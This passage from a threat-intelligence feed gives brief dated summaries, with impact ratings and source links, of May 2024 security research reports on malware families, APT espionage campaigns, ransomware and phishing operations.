Summary:: The Qianxin researchers shared their analysis which uncovered the use of Kiteshield packer by various cybercriminal groups to evade detection on Linux platforms. The researchers reverse-engineered samples from APT group Winnti, cybercrime group DarkMosquito, and a script kiddie operation, revealing Kiteshield's anti-debugging techniques, string obfuscation, and encryption methods. Despite the initial excitement over potentially novel threats, the findings highlight cybercriminals adopting Kiteshield to bypass antivirus detection. The report emphasizes the need for improved detection capabilities against this packer as Linux malware continues evolving.

Source: https://blog.xlab.qianxin.com/kiteshield_packer_is_being_abused_by_linux_cyber_threat_actors/

Intel Source:: Microsoft

Intel Name:: North_Korean_Hackers_Linked_to_New_FakePenny_Ransomware

Date of Scan:: 2024-05-29

Impact:: MEDIUM

Summary:: Microsoft researchers have discovered a new North Korean threat actor, now known as Moonstone Sleet (formerly Storm-1789). This actor targets companies for financial and cyberespionage purposes by utilizing a variety of well-established tactics also employed by other North Korean threat actors as well as original attack methodologies. In order to interact with possible targets, Moonstone Sleet is known to build fake companies and job opportunities, use trojanized copies of legitimate tools, create malicious games, and distribute brand-new customized ransomware.

Source: https://www.microsoft.com/en-us/security/blog/2024/05/28/moonstone-sleet-emerges-as-new-north-korean-threat-actor-with-new-bag-of-tricks/

Intel Source:: Harfanglab

Intel Name:: Allasenha_Allakore_variant_targeting_Lating_America

Date of Scan:: 2024-05-29

Impact:: LOW

Summary:: Researchers from HarfangLabs have discovered a malware called "AllaSenha" that targets Brazilian bank accounts using Python scripts and a Delphi-developed loader. This malware is a variant of the AllaKore RAT and uses the Azure cloud for its command and control. It begins with a fake PDF file spread through phishing emails. When the user opens the PDF file, it triggers a series of downloads and executions, including a BAT file named "BPyCode launcher." This launcher runs a PowerShell command to download a Python script. AllaSenha targets major Brazilian banks, stealing passwords and authentication tokens.

Source: https://harfanglab.io/en/insidethelab/allasenha-allakore-variant-azure-c2-steal-banking-latin-america/

Intel Source:: PTsecurity

Intel Name:: Hellhounds_Operation_Lahat_Part_2

Date of Scan:: 2024-05-29

Impact:: LOW

Summary:: A group called Hellhounds has continued attacking Russian organizations into 2024 using various techniques to compromise infrastructure. Research shows malware toolkit development began in 2019. The group maintains presence inside critical organizations for years. Although based on open-source projects, malware is modified to bypass defenses. The earliest Windows and Linux samples are from 2019 and 2021. Encryption and obfuscation are used. Foothold gained via system services. The main C2 method is DNS tunneling. At least 48 confirmed victims, focused on public sector and IT contractors. Victims are likely compromised via supply chain attacks and trusted relationships.

Source: https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/hellhounds-operation-lahat-part-2/

Intel Source:: Proofpoint

Intel Name:: Uncovers_Piano_Themed_Email_Scam

Date of Scan:: 2024-05-29

Impact:: LOW

Summary:: Researchers at Proofpoint have noticed a pattern of activity involving malicious email campaigns that use piano-themed messages to trick users into falling for advance fee fraud (AFF) scams. The campaigns are still continuing strong and have been since at least January 2024. Although there has been some targeting of other businesses, such as healthcare and food and beverage services, the majority of the messages are directed towards students and teachers at North American schools and universities. So far this year, Proofpoint has seen at least 125,000 mails connected to the cluster of piano scam campaigns.

Source: https://www.proofpoint.com/us/blog/threat-insight/security-brief-sing-us-song-youre-piano-scam

Intel Source:: CYFIRMA

Intel Name:: Threat_Actors_Actively_Exploiting_CVE_2024_3273

Date of Scan:: 2024-05-29

Impact:: LOW

Summary:: Cyfirma researchers have discovered that hackers are actively exploiting CVE-2024-3273, a severe vulnerability in D-Link NAS equipment, by sharing affected device IP addresses on underground forums. With over 90,000 devices globally potentially impacted and the vulnerability listed on CISA's list of known exploited vulnerabilities, taking immediate action is essential to protect data and stop unwanted access. In order to reduce risks, users should upgrade firmware, modify default credentials, and think about retiring outdated devices anywhere, but particularly in the UK, Russia, Germany, Italy, USA, and France.

Source: https://www.cyfirma.com/research/threat-actors-actively-exploiting-cve-2024-3273-underground-forums-share-ip-addresses-of-vulnerable-d-link-nas-devices/

Intel Source:: STR

Intel Name:: Potential_C2_Seeder_Queries_05282024

Date of Scan:: 2024-05-28

Impact:: MEDIUM

Summary:: This research is part of Securonix Threat Labs - Threat Research Team

Source: https://github.com/str-int-repo/str-seeder-behavior-queries

Intel Source:: Huntress

Intel Name:: Discovering_the_Middle_Tradecraft_HTML_Smuggling_Adversary

Date of Scan:: 2024-05-28

Impact:: LOW

Summary:: Researchers from Huntress have discovered the infrastructure of a widespread phishing campaign, which includes possibly unique tradecraft that mixes transparent proxy, injected iframes, and HTML smuggling. By using this method, an attacker can get around MFA and steal credentials from a victim who logs into a locally rendered, transparently proxied iframe of the Outlook login portal.

Source: https://www.huntress.com/blog/smugglers-gambit-uncovering-html-smuggling-adversary-in-the-middle-tradecraft

Intel Source:: Checkpoint

Intel Name:: WIDESPREAD_NSIS_BASED_MALICIOUS_PACKER_FAMILY

Date of Scan:: 2024-05-28

Impact:: LOW

Summary:: Checkpoint researchers have identified a packer family using the NSIS (Nullsoft Scriptable Install System) tool, commonly used by cybercriminals to hide malware from detection and analysis. These tools employ compression and encryption to create unique malware samples, making it difficult for antivirus software to detect them. They protect various malware families, such as AgentTesla, Remcos, and XLoader. NSIS-packed malware typically includes encrypted files and a malicious DLL that decrypts and executes the payload.

Source: https://research.checkpoint.com/2024/static-unpacking-for-the-widespread-nsis-based-malicious-packer-family/

Intel Source:: Forcepoint

Intel Name:: Beware_of_HTML_Masquerading_as_PDF_Viewer_Login_Pages

Date of Scan:: 2024-05-28

Impact:: MEDIUM

Summary:: Forcepoint X-Labs researchers have discovered a large number of phishing email instances in their telemetry targeting various government departments in APAC and masquerading as PDF viewer login pages.

Source: https://www.forcepoint.com/blog/x-labs/html-phishing-pdf-viewer-login-apac

Intel Source:: Resecurity

Intel Name:: Online_scams_during_Hajj_season

Date of Scan:: 2024-05-28

Impact:: LOW

Summary:: Resecurity researchers observed the rise of fraudulent schemes targeting Hajj pilgrims, highlighting the use of fake websites and social media to impersonate the official Hajj platform, Nusuk. Fraudsters collect sensitive information for identity theft and financial fraud. Also, Resecurity has blocked over 630 accounts distributing fraudulent content. The article advises verifying the authenticity of websites, using official ministry accounts, obtaining written agreements, and reporting scams to authorities. It emphasizes the importance of caution and awareness to prevent victimization during the Hajj season.

Source: https://www.resecurity.com/blog/article/navigating-the-hajj-season-a-time-of-spiritual-unity-and-rising-cyber-threats-targeting-consumers

Intel Source:: ISC.SANS

Intel Name:: Using_Passive_DNS_sources

Date of Scan:: 2024-05-28

Impact:: LOW

Summary:: ISC.Sans analyst shared a comprehensive guide on using various tools and services for DNS reconnaissance and enumeration during penetration tests. His analysis also discusses using Shodan for additional host information and the Cisco Umbrella "Investigate" API for passive DNS data. Practical applications, limitations, and examples of API usage are detailed, emphasizing the value of these tools in identifying network assets and potential vulnerabilities.

Source: https://isc.sans.edu/diary/28596

Intel Source:: Tenable

Intel Name:: Kinsing_malware_hides_itself

Date of Scan:: 2024-05-28

Impact:: LOW

Summary:: Tenable researchers discovered that Kinsing also attacks Apache Tomcat servers, and uses new techniques to hide itself on the filesystem, including utilizing innocent and non-suspicious file locations for persistence. In this article, we present our technical findings and share relevant indicators of compromise (IOCs) to help the community defend against this emerging threat.

Source: https://www.tenable.com/blog/kinsing-malware-hides-itself-as-a-manual-page-and-targets-cloud-servers

Intel Source:: Trellix

Intel Name:: Fake_Antivirus_Sites_Spreading_Android_and_Windows_Malware

Date of Scan:: 2024-05-27

Impact:: LOW

Summary:: Trellix researchers noticed several fake antivirus websites in mid-April 2024, which were providing extremely complex malicious files like APK, EXE, and Inno setup installers, which had the ability to spy and steal. It is predatory to host malicious software on websites that appear respectable to the general public, especially to individuals who want to safeguard their devices from online threats.

Source: https://www.trellix.com/blogs/research/a-catalog-of-hazardous-av-sites-a-tale-of-malware-hosting/

Intel Source:: Threatdown

Intel Name:: Arc_Browser_Windows_Launch_Targeted_by_Google_Ads_Malvertising

Date of Scan:: 2024-05-27

Impact:: LOW

Summary:: Researchers at ThreatDown have discovered a new Google Ads malvertising campaign, coinciding with the release of the Arc web browser for Windows, that was tricking people into downloading trojanized installers infected with malware payloads. The Arc browser is a new web browser that differentiates itself from other browsers with its creative user interface design.

Source: https://www.threatdown.com/blog/threat-actors-ride-the-hype-for-newly-released-arc-browser/

Intel Source:: ISC.SANS

Intel Name:: TXZ_Files_as_Malspam_Attachments

Date of Scan:: 2024-05-27

Impact:: LOW

Summary:: ISC.SANS researchers have discovered the covert utilization of TXZ files in malspam campaigns, an unconventional tactic by threat actors to evade detection. Unraveling recent incidents, they explore how these files, disguised as innocuous RAR archives, have been employed in targeted campaigns across Spanish, Slovak, Croatian, and Czech-speaking regions.

Source: https://isc.sans.edu/diary/Files+with+TXZ+extension+used+as+malspam+attachments/30958/

Intel Source:: CYFIRMA

Intel Name:: Iluria_Stealer_is_Variant_of_Another_Discord_Stealer

Date of Scan:: 2024-05-27

Impact:: LOW

Summary:: The Iluria Stealer is likewise an NSIS installer with an obfuscated Electron application. This program downloads a malicious JavaScript file to replace Discord's index.js file in the second stage, after which it decrypts malicious code during execution to steal Discord tokens and browser credentials. Any account modifications, such as password and email updates or 2FA activation, are intercepted by this injected file, which then relays the information back to the attacker's command and control (C2) server.

Source: https://www.linkedin.com/posts/cyfirma-research-6a8073245_iluria-stealer-a-variant-of-another-discord-activity-7199376961935138817-74OP?utm_source=li_share&utm_content=feedcontent&utm_medium=g_dt_web&utm_campaign=copy

Intel Source:: CYFIRMA

Intel Name:: Technical_Analysis_of_SYNAPSE_Ransomware

Date of Scan:: 2024-05-27

Impact:: LOW

Summary:: CYFIRMA researchers have detected Synapse Ransomware-as-a-Service (RaaS) while keeping an eye on several unofficial forums. Synapse RaaS was discovered in the wild in February 2024, and it used affiliates that were active on the Dark Web to distribute the SynapseCrypter (payload). With its powerful new ransomware strain and sophisticated features, the Synapse 1.0.0 Stable Version delivers quick encryption schemes, multiple encryption settings, including custom options, and guards against file corruption. Its effectiveness is increased by extra features including silent encryption, NTFS search, and impersonation. It uses two dissemination mechanisms, network scanners, and encryption as a top priority. It is based on Curve25519/ChaCha8 encryption and has several more features, such as self-delete and shadow copy wiping. It's a really effective ransomware strain all around, complete with a TOR-based chat system, C2, and payload building.

Source: https://www.linkedin.com/posts/cyfirma-research-6a8073245_synapse-ransomware-technical-analysis-activity-7199739829952131074-JzMg?utm_source=li_share&utm_content=feedcontent&utm_medium=g_dt_web&utm_campaign=copy

Intel Source:: Netscope

Intel Name:: Multiple_phishing_campaigns_that_abuse_Cloudflare_workers

Date of Scan:: 2024-05-25

Impact:: MEDIUM

Summary:: Netskope Threat Labs is observing multiple phishing campaigns that abuse Cloudflare Workers. The campaigns use two very different techniques. One campaign uses HTML smuggling, a detection evasion technique often used for downloading malware, to hide phishing content from network inspection. The other uses a method called transparent phishing, where the attacker uses Cloudflare Workers to act as a reverse proxy server for a legitimate login page, intercepting traffic between the victim and the login page to capture credentials, cookies, and tokens.

Source: https://www.netskope.com/blog/phishing-with-cloudflare-workers-transparent-phishing-and-html-smuggling

Intel Source:: Threatdown

Intel Name:: The_distribute_of_Gootloader_malware

Date of Scan:: 2024-05-24

Impact:: MEDIUM

Summary:: The Threatdown analysis shows the intricate workings of the Gootloader malware campaign. Through a very well-planted social engineering scheme involving SEO poisoning and fake forums, threat actors lure unsuspecting victims into downloading a malicious JavaScript file disguised as a legitimate resource. This initial payload creates persistence via scheduled tasks, leading to further PowerShell execution and attempts to connect to malicious command and control servers, enabling data exfiltration and other nefarious actions.

Source: https://www.threatdown.com/blog/gootloader-05-23-2024

Intel Source:: CERT-UA

Intel Name:: SuperOps_RMM_Exploited_for_Unauthorized_Access

Date of Scan:: 2024-05-24

Impact:: MEDIUM

Summary:: CERT-UA researchers have uncovered a sophisticated cyber attack targeting Ukrainian organizations. The attackers utilize a legitimate program, SuperOps RMM, to gain unauthorized remote access to victims' computers. The attack involves the delivery of a malicious SCR file via email, which, when executed, downloads and executes additional Python code. This code ultimately extracts and runs an MSI file, granting the attackers unauthorized access.

Source: https://cert.gov.ua/article/6279419

Intel Source:: PaloAlto

Intel Name:: Chinese_Campaign_Targeting_Middle_East_African_and_Asian_Government_Entities

Date of Scan:: 2024-05-24

Impact:: MEDIUM

Summary:: Researchers at PaloAlto have noticed that a Chinese advanced persistent threat (APT) group has been running a campaign that they refer to as Operation Diplomatic Specter. Since at least late 2022, political entities throughout the Middle East, Africa, and Asia have been the focus of this attack. An examination of this threat actor's activities uncovers long-term espionage operations against at least seven government entities. The threat actor used uncommon email exfiltration techniques against compromised servers to conduct extensive intelligence collecting operations.

Source: https://unit42.paloaltonetworks.com/operation-diplomatic-specter/

Intel Source:: Securelist

Intel Name:: Unveiling_a_Sophisticated_Ransomware_Exploiting_BitLocker

Date of Scan:: 2024-05-24

Impact:: LOW

Summary:: Securelist researchers have discovered how attackers are leveraging native Windows features like BitLocker to execute sophisticated ransomware attacks. This in-depth analysis uncovers the intricacies of the VBScript utilized, the manipulation of disk resizing utilities, encryption techniques, and the covering of tracks.

Source: https://securelist.com/ransomware-abuses-bitlocker/112643/

Intel Source:: Rapid7

Intel Name:: The_Justice_AV_Solutions_had_a_backdoor_installer

Date of Scan:: 2024-05-24

Impact:: LOW

Summary:: Rapid7 discovered the JAVS Viewer software version 8.3.7 from Justice AV Solutions contained a backdoor installer letting attackers gain remote control over affected systems. The malicious installer included a binary named fffmpeg.exe which executed obfuscated PowerShell scripts and facilitated unauthorized access, data exfiltration, and credential harvesting. Affected users should immediately re-image compromised endpoints, reset credentials, and install the latest JAVS Viewer version after remediation.

Source: https://www.rapid7.com/blog/post/2024/05/23/cve-2024-4978-backdoored-justice-av-solutions-viewer-software-used-in-apparent-supply-chain-attack/

Intel Source:: Blackberry

Intel Name:: Transparent_Tribe_continiues_to_target_Indian_Government_Defense_and_Aerospace_sectors

Date of Scan:: 2024-05-24

Impact:: MEDIUM

Summary:: Last couple of months the Transparent Tribe group has been putting a heavy reliance on cross-platform programming languages such as Python, Golang, and Rust, as well as abusing popular web services such as Telegram, Discord, Slack, and Google Drive. We observed the group deploying a range of malicious tools mirroring those used in previous campaigns as well as newer iterations, which we assess with moderate to high confidence was indeed conducted by Transparent Tribe.

Source: https://blogs.blackberry.com/en/2024/05/transparent-tribe-targets-indian-government-defense-and-aerospace-sectors

Intel Source:: CERT-AGID

Intel Name:: Changing_Course_Ransomware_Targeting_Italy

Date of Scan:: 2024-05-24

Impact:: MEDIUM

Summary:: CERT-AGID researchers have identified the emergence of the "Changing Course" ransomware presents a unique threat to Italy's cybersecurity landscape. Unlike typical ransomware focused on financial gain, this malware combines destructive capabilities with a political agenda. Utilizing AES encryption and evasive techniques, it encrypts files while promoting an anti-Zionist ideology through its ransom note.

Source: https://cert-agid.gov.it/news/ransomware-cambiare-rotta-una-minaccia-distruttiva-per-litalia/

Intel Source:: Cyfirma

Intel Name:: A_new_malware_Iluria_stealer

Date of Scan:: 2024-05-24

Impact:: LOW

Summary:: CYFIRMA researchers spotted a new malware. The ‘Iluria Stealer’ is a new variant created by the developer who created the Nikki Stealer and who uses the alias ‘Ykg”. Both share similar code with SonicGlyde; a discord stealer, a variant of the Epsilon Stealer, captures browser cookies, credentials, and credit card information saved in Discord. This time, four individuals manage the Iluria Stealer: Ykg, Noxty, Outlier, and Ness.

Source: https://www.cyfirma.com/research/iluria-stealer-a-variant-of-another-discord-stealer/

Intel Source:: Checkpoint

Intel Name:: Sharp_Dragon_Expands_Cyber_Operations_to_Africa_and_the_Caribbean

Date of Scan:: 2024-05-24

Impact:: LOW

Summary:: Researchers from Checkpoint discovered that Sharp Dragon, formerly known as Sharp Panda, is still operating and has now shifted its attention to the Caribbean and Africa. This is a Chinese threat actor that spreads its infection and gains early traction in new areas by using reliable government entities. The threat actors are using Cobalt Strike Beacon instead of custom backdoors, expanding their reconnaissance operations, and choosing their targets with more prudence.

Source: https://research.checkpoint.com/2024/sharp-dragon-expands-towards-africa-and-the-caribbean/

Intel Source:: Tinexta Cyber

Intel Name:: KeyPlug_Backdoor_Employed_in_Attacks_Against_Several_Italian_Industries

Date of Scan:: 2024-05-24

Impact:: MEDIUM

Summary:: Tinexta Cyber researchers have uncovered a backdoor known as KeyPlug, which hit for months a variety of Italian industries. This backdoor is attributed to the arsenal of APT41,a group whose origin is tied to China. The backdoor has been developed to target both Windows and Linux operative systems and using different protocols to communicate which depend on the configuration of the malware sample itself.

Source: https://yoroi.company/en/research/uncovering-an-undetected-keyplug-implant-attacking-industries-in-italy/

Intel Source:: Qianxin

Intel Name:: CatDDoS_related_gangs_remain_active

Date of Scan:: 2024-05-24

Impact:: LOW

Summary:: CatDDoS-related gangs remain active and have exploited over 80 vulnerabilities over the last three months, with the maximum number of targets exceeding 300+ per day.

Source: https://blog.xlab.qianxin.com/catddos-derivative-en/?ref=news.risky.biz

Intel Source:: Palo Alto

Intel Name:: Operation_Diplomatic_Specter_Campaign

Date of Scan:: 2024-05-23

Impact:: MEDIUM

Summary:: Researchers from Palo Alto have uncovered an ongoing cyber espionage campaign named Operation Diplomatic Specter conducted by a Chinese APT group targeting political entities in the Middle East, Africa, and Asia since 2022. This campaign focuses on seven governmental entities, aiming to collect sensitive and classified information related to geopolitical affairs. Their primary targets include military operations, political meetings, ministries, and high-ranking officials. Their focus on gathering China-related geopolitical and economic information, aligning with Chinese state interests.

Source: https://unit42.paloaltonetworks.com/operation-diplomatic-specter/

Intel Source:: Any.Run

Intel Name:: Updates_on_Mirai_Malware_Analysis

Date of Scan:: 2024-05-23

Impact:: MEDIUM

Summary:: Mirai is a self-propagating malware that scans the internet for vulnerable IoT devices and infects them to create a botnet. Mirai variants utilize lists of common default credentials to gain access to devices. Mirai's primary use is for launching distributed denial-of-service (DDoS) attacks, but it has also been used for cryptocurrency mining.

Source: https://any.run/malware-trends/mirai

Intel Source:: Cyfirma

Intel Name:: SamsStealer_stealers_targeting_Windows_systems

Date of Scan:: 2024-05-22

Impact:: MEDIUM

Summary:: Cyfirma's research team recently identified a binary in the wild, identified as an information stealer; “SamsStealer”. It is a 32-bit Windows executable designed to stealthily extract sensitive information from victims’ systems. Written in .NET, this malware targets a wide range of browsers and applications, including Discord, Chrome, and Microsoft Edge, to steal passwords, cookies, and cryptocurrency wallet data.

Source: https://www.cyfirma.com/research/samsstealer-unveiling-the-information-stealer-targeting-windows-systems/

Intel Source:: Securelist

Intel Name:: Acrid_ScarletStealer_and_Sys01_stealers

Date of Scan:: 2024-05-22

Impact:: MEDIUM

Summary:: Last couple of months, Securelist shared several private reports on stealers as they discovered Acrid (a new stealer), ScarletStealer (another new stealer), and Sys01, which had been updated quite a bit since the previous public analysis.

Source: https://securelist.com/crimeware-report-stealers/112633/

Intel Source:: Securonix Threat Labs

Intel Name:: Malware_Distribution_via_Cloud_Services_Uses_Unicode_Trick_to_Mislead_Users

Date of Scan:: 2024-05-22

Impact:: MEDIUM

Summary:: Securonix Threat Labs researchers have uncovered a new attack campaign known as CLOUD#REVERSER, which has been observed staging malicious payloads using legitimate cloud storage services such as Google Drive and Dropbox. The CLOUD#REVERSER's VBScript and PowerShell scripts utilize Dropbox and Google Drive as staging locations for managing file uploads and downloads, which naturally involves command-and-control-like activities.

Source: https://www.securonix.com/blog/analysis-and-detection-of-cloudreverser-an-attack-involving-threat-actors-compromising-systems-using-a-sophisticated-cloud-based-malware/

Intel Source:: Antiy and Elastic Security Labs

Intel Name:: GhostEngine_Mining_Attacks_Using_Vulnerable_Drivers_to_Kill_EDR_Security

Date of Scan:: 2024-05-22

Impact:: LOW

Summary:: A malicious crypto mining campaign dubbed 'REF4578' has been uncovered to distribute a malicious payload known as GhostEngine, which utilizes vulnerable drivers to disable security products and launch an XMRig miner. Elastic Security Labs and Antiy researchers highlighted the extraordinary sophistication of these crypto-mining attacks in separate studies, as well as shared detection methods to assist defenders in identifying and stopping them.

Source: https://www.antiy.com/response/HideShoveling.html https://www.elastic.co/security-labs/invisible-miners-unveiling-ghostengine

Intel Source:: Bitdefender Labs

Intel Name:: A_New_threat_actor_Unfading_Sea_Haze_in_South_China

Date of Scan:: 2024-05-22

Impact:: MEDIUM

Summary:: Bitdefender Labs has recently uncovered a sophisticated cyberespionage campaign targeting high-level organizations in the South China Sea region. The threat actor behind this campaign, designated as ""Unfading Sea Haze,"" aligns with Chinese interests and has been targeting military and government entities since 2018. The group primarily depended on the Gh0st RAT framework but later moved to techniques like fileless attacks. Their operations include spear-phishing campaigns, custom malware, and using legitimate tools for remote access. The attackers also collect sensitive data through keyloggers, browser data stealers, and monitoring portable devices, exfiltrating data via custom tools and the curl utility.

Source: https://www.bitdefender.com/blog/businessinsights/deep-dive-into-unfading-sea-haze-a-new-threat-actor-in-the-south-china-sea/

Intel Source:: Sentilone

Intel Name:: Hacktivists_Attack_Philippine_Government_Using_Ransomware

Date of Scan:: 2024-05-22

Impact:: MEDIUM

Summary:: SentinelOne researchers have claim the Ikaruz Red Team is one of a few hacktivist groups targeting Philippine government targets. The group is carrying out "small-scale" attacks with a range of ransomware builders, including as AlphV, Vice Society, LockBit, and Clop. Additionally, it promotes online data leaks from several Philippine entities.

Source: https://www.sentinelone.com/blog/ikaruz-red-team-hacktivist-group-leverages-ransomware-for-attention-not-profit/

Intel Source:: CTIN

Intel Name:: Malicious_campaign_placing_backdoors_in_US_Critical_Infrastructure_facilities

Date of Scan:: 2024-05-22

Impact:: MEDIUM

Summary:: Researchers at CTIN have discovered current digital forensics evidence that may provide details and analyses to the malicious campaign being undertaken by a Chinese state-sponsored threat actor dubbed VoltTyphoon that is placing backdoors in US Critical Infrastructure facilities. This evidence is provided below to provide detailed cyber observables for cyber defense teams in their efforts to harden servers and hosts against such attacks.

Source: https://cyberthreatintelligencenetwork.com/index.php/2024/05/20/knigsfot-the-covert-cyber-assault-on-global-infrastructure/

Intel Source:: Infloblox

Intel Name:: ALPHV_Blackcat_ransomware_alert_for_new_IOCs

Date of Scan:: 2024-05-22

Impact:: MEDIUM

Summary:: Infoblox received an alert and released new Indicators of Compromise (IoC), including several command and control (C&C) server domains essential to the Kill Chain1 currently used by the Blackcat threat actors.

Source: https://blogs.infoblox.com/threat-intelligence/dns-early-detection-breaking-the-blackcat-ransomware-kill-chain/

Intel Source:: Any.Run

Intel Name:: Lumma_Stealer_Malware_Analysis

Date of Scan:: 2024-05-21

Impact:: LOW

Summary:: Lumma is a widely accessible malware stealer that is sold openly across Dark Web forums and Telegram channels. Lumma Stealer poses a significant threat to a wide range of computer systems, targeting devices running Windows operating systems from Windows 7 up to Windows 11. This broad compatibility allows the malware to infiltrate a vast network of systems, increasing its potential reach and impact.

Source: https://any.run/malware-trends/lumma

Intel Source:: Elastic Security Labs

Intel Name:: Latrodectus_Malware_Loader_Found_in_Phishing_Campaigns_Replacing_IcedID

Date of Scan:: 2024-05-21

Impact:: LOW

Summary:: Researchers at Elastic Security Labs have seen an increase in email phishing campaigns that deliver Latrodectus, a newly developed malware loader that is believed to be the IcedID malware successor, beginning in early March 2024. These campaigns usually involve a known infection chain with large JavaScript files that use WMI to launch msiexec.exe and install an MSI file that is hosted remotely on a WEBDAV share.

Source: https://www.elastic.co/security-labs/spring-cleaning-with-latrodectus

Intel Source:: ISC.SANS

Intel Name:: The_importance_to_implement_MFA

Date of Scan:: 2024-05-21

Impact:: MEDIUM

Summary:: ISC. SANS researcher Rob VandenBrink had an interesting call from a client recently - they had a number of "net use" and "psexec" commands pop up on a domain controller, all called from PSEXEC. The source IP was a VPN session.

Source: https://isc.sans.edu/handler_list.html#rob-vandenbrink

Intel Source:: Any.Run

Intel Name:: New_Hijack_Loader_Variant

Date of Scan:: 2024-05-21

Impact:: MEDIUM

Summary:: Security researchers discovered a new version of Hijack Loader, which decrypts and parses a PNG image to load its second-stage payload. That second stage features a modular architecture, with its primary aim being the injection of the main instrumentation module.

Source: https://any.run/cybersecurity-blog/new-hijackloader-version/ https://any.run/malware-trends/hijackloader

Intel Source:: Sonicwall

Intel Name:: Remcos_that_uses_a_PrivateLoader_module

Date of Scan:: 2024-05-21

Impact:: MEDIUM

Summary:: Recently, the SonicWall Capture Labs researchers investigated a sample of the RemcosRAT that uses a PrivateLoader module to get more details of additional data on the victim’s machine. By installing VB scripts, altering the registry, and setting up services to restart the malware at variable times or by control, this malware is able to infiltrate a system completely and remain undetected.

Source: https://blog.sonicwall.com/en-us/2024/05/remcos-is-pairing-with-privateloader-to-extend-its-capabilities/

Intel Source:: Cyble

Intel Name:: A_campaign_utilizing_malicious_LNK_files_masquerading_as_a_PDF_document

Date of Scan:: 2024-05-21

Impact:: LOW

Summary:: Cyble researchers have identified a campaign utilizing malicious .LNK files masquerading as a PDF document. Upon execution, the .LNK file loads and displays a human rights seminar invitation as a lure document, suggesting that the threat actor targets individuals with a background or interest in human rights issues.

Source: https://cyble.com/blog/tiny-backdoor-goes-undetected-suspected-turla-leveraging-msbuild-to-evade-detection/

Intel Source:: Checkpoint

Intel Name:: Void_Mantocore_Destructive_Activities_in_Israel

Date of Scan:: 2024-05-21

Impact:: MEDIUM

Summary:: CheckPoint researchers have found that the Iranian hacker group Void Manticore, also known as Storm-842, is linked to Iran's Ministry of Intelligence and Security (MOIS). They carry out destructive attacks and leak stolen information online. The group uses fake identities like "Homeland Justice" for attacks in Albania and "Karma" for attacks in Israel. They use simple methods and custom programs for both Windows and Linux systems, sometimes manually deleting files and using tools to move around the victim's network. Recently, they have been targeting Israeli organizations with a special wiper called BiBi, named after Israeli Prime Minister Benjamin Netanyahu, highlighting their political motives.

Source: https://research.checkpoint.com/2024/bad-karma-no-justice-void-manticore-destructive-activities-in-israel/

Intel Source:: Any.Run

Intel Name:: Rhadamanthys_Stealer_Malware_Analysis

Date of Scan:: 2024-05-21

Impact:: LOW

Summary:: Rhadamanthys is a C++ information-stealing malware that extracts sensitive data from infiltrated machines. Its layered operational chain and advanced evasion tactics make it a major risk in cybersecurity landscapes.

Source: https://any.run/malware-trends/rhadamanthys

Intel Source:: CERT-UA

Intel Name:: UAC0006_Intensifies_Cyberattacks_And_Threatening_Financial_Networks

Date of Scan:: 2024-05-21

Impact:: MEDIUM

Summary:: CERT-UA researchers have identified that the financially motivated cybercriminal group UAC-0006 has significantly ramped up its activities, particularly targeting financial systems. Employing SMOKELOADER malware distributed through email campaigns containing ZIP archives with malicious files, the group aims to infiltrate systems and deploy harmful programs like TALESHOT and RMS.

Source: https://cert.gov.ua/article/6279366

Intel Source:: Cyble

Intel Name:: A_Sophisticated_Android_Banking_Trojan_Targeting_Multilingual_Users

Date of Scan:: 2024-05-20

Impact:: MEDIUM

Summary:: Antidot, a newly identified Android Banking Trojan, camouflages itself as a Google Play update application, featuring multilingual fake update pages to broaden its victim pool. Employing sophisticated tactics like overlay attacks, keylogging, and WebSocket communication with a Command and Control (C&C) server, Antidot enables real-time interaction for executing malicious commands, including SMS collection and remote device manipulation. Notably, it utilizes MediaProjection to implement VNC for remote control of compromised devices. This discovery, alongside recent findings on the Brokewell Android Banking Trojan by Cyble Research and Intelligence Labs (CRIL), underscores the escalating sophistication of mobile malware threats.

Source: https://cyble.com/blog/new-antidot-android-banking-trojan-masquerading-as-google-play-updates/

Intel Source:: Security Intelligence

Intel Name:: Multi_Component_Banking_Trojan_and_Its_Expanding_LATAM_Focused_Campaigns

Date of Scan:: 2024-05-20

Impact:: MEDIUM

Summary:: A sophisticated banking trojan operating globally as a Malware-as-a-Service (MaaS). It targets over 1500 banking applications across 60+ countries, with a recent surge in phishing campaigns impersonating government entities in Latin America. These campaigns, notably in Mexico and Argentina, employ urgent messages to lure victims into downloading malicious files disguised as legitimate documents. With advanced features like string decryption and dynamic domain generation, Grandoreiro poses a significant threat to online banking security, highlighting the evolving landscape of cyber threats in the region.

Source: https://securityintelligence.com/x-force/grandoreiro-banking-trojan-unleashed/

Intel Source:: Forcepoint

Intel Name:: An_Examination_of_Metamorfo_Banking_Trojan

Date of Scan:: 2024-05-17

Impact:: LOW

Summary:: Researchers at Forcepoint have noticed a rise in the incidence of banking trojans recently and they delved into one specific campaign. This malware, also known as Metamorfo, spreads by malspam campaigns that entice victims to click on HTML attachments. After it is clicked, a sequence of actions is started with the goal of collecting system metadata.

Source: https://www.forcepoint.com/blog/x-labs/exploring-metamorfo-banking-malware

Intel Source:: Uptycs

Intel Name:: XMRig_Malware_Deployment_and_Defensive_Strategies

Date of Scan:: 2024-05-17

Impact:: LOW

Summary:: Researchers from Uptycs have discovered a significant, ongoing operation within the Log4j campaign, identified through their honeypot collection. This campaign involves over 1700 dedicated IPs and aims to deploy XMRig cryptominer malware onto targeted systems.

Source: https://www.uptycs.com/blog/log4j-campaign-xmrig-malware

Intel Source:: Proofpoint

Intel Name:: SugarGh0st_RAT_Aiming_at_US_Artificial_Intelligence_Experts

Date of Scan:: 2024-05-16

Impact:: MEDIUM

Summary:: Researchers at Proofpoint have discovered a SugarGh0st RAT campaign that targeting organizations in the United States engaged in artificial intelligence efforts, including as those in government, private sector, and academia. They identify the cluster responsible for this activity as UNK_SweetSpecter.

Source: https://www.proofpoint.com/us/blog/threat-insight/security-brief-artificial-sweetener-sugargh0st-rat-used-target-american

Intel Source:: ASEC

Intel Name:: Leveraging_Tesseract_for_Image_File_Exfiltration

Date of Scan:: 2024-05-16

Impact:: LOW

Summary:: ASEC researchers have uncovered a new tactic employed by ViperSoftX attackers, utilizing the Tesseract OCR engine to exfiltrate users image files. ViperSoftX, a persistent malware strain, is known for executing attackers commands and stealing cryptocurrency-related information. This highlights the recent discovery of ViperSoftX's utilization of Tesseract, focusing on its modus operandi and recent developments. The malware reads images stored on infected systems and extracts strings using Tesseract.

Source: https://asec.ahnlab.com/en/65426/

Intel Source:: Welivesecurity

Intel Name:: Infiltration_of_a_European_Ministry_of_Foreign_Affairs

Date of Scan:: 2024-05-16

Impact:: LOW

